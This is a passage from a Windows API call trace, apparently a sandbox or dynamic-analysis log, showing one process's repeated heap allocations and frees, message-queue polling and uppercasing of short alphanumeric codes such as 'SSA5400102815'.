lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0164.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0164.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0164.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0164.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0164.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0164.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0164.670] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0164.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00b0 [0164.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0164.670] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0164.670] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0164.670] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0164.670] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0164.670] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0164.670] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0164.670] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0164.670] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0164.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0164.670] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0164.670] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0164.670] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0164.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0164.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0164.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00a0 [0164.670] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0164.670] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0164.670] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0164.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa6b8 [0164.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0164.671] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0164.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0164.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0164.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0164.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0164.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00c0 [0164.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0164.671] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0164.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00c0 [0164.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0164.671] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0164.671] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0164.671] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0164.671] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0164.671] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0164.671] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0164.671] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0164.671] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0164.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0164.671] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0164.671] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0164.672] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0164.672] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0164.672] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0164.672] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0164.672] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0164.672] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00c0 [0164.672] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0164.672] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0164.672] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0164.672] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0164.672] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0164.672] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0164.672] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0164.672] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0164.672] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0164.672] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0164.672] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0164.672] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0164.672] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0164.672] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0164.672] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0164.673] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0164.673] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0164.673] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0164.673] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0164.673] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0164.673] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0164.673] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0164.673] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0164.673] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0164.673] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0164.673] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0164.673] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0164.673] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0164.673] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0164.673] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0164.673] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0164.673] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa6b8 [0164.673] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0164.673] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0164.673] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0164.673] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0164.673] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0164.674] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0164.674] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0164.674] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0164.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0164.674] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00b0 [0164.674] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0164.674] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0164.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0164.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0164.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0164.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0164.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0164.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0164.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0164.674] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0164.675] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0164.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0164.675] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0164.675] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0164.675] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0164.675] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0164.675] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0164.675] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0164.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0164.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0164.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0164.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0164.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0164.675] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0164.675] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0164.675] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0164.675] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0164.675] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0164.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0164.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0164.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0164.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0164.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0164.676] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0164.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0164.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0164.676] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0164.676] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0164.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0164.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0164.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0164.676] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0164.676] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0164.676] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0164.676] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0164.676] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0164.676] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0164.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0164.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0164.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0164.676] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d920 [0164.676] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0164.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0164.676] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0164.676] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0164.677] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0164.677] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0164.677] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0164.677] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0164.677] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00b0 [0164.677] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0164.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0164.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0164.677] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa670 [0164.677] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0164.677] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0164.677] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0164.677] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00c0 [0164.677] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0164.677] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0164.677] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00d0 [0164.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00d0 | out: hHeap=0x25c0000) returned 1 [0164.677] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0164.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0164.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00d0 | out: hHeap=0x25c0000) returned 1 [0164.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0164.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0164.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0164.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0164.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0164.678] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0164.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0164.678] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0164.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00d0 | out: hHeap=0x25c0000) returned 1 [0164.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0164.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0164.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0164.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0164.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0164.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0164.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0164.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0164.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0164.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0164.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0164.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0164.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0164.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0164.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0164.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0164.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0164.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0164.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0164.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0164.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0164.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0164.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0164.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0164.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0164.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0164.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0164.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0164.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0164.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0164.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0164.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0164.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0164.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0164.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0164.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0164.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24d7a58 | out: hHeap=0x25c0000) returned 1 [0164.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0164.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0164.681] HeapFree (in: hHeap=0x25c0000, 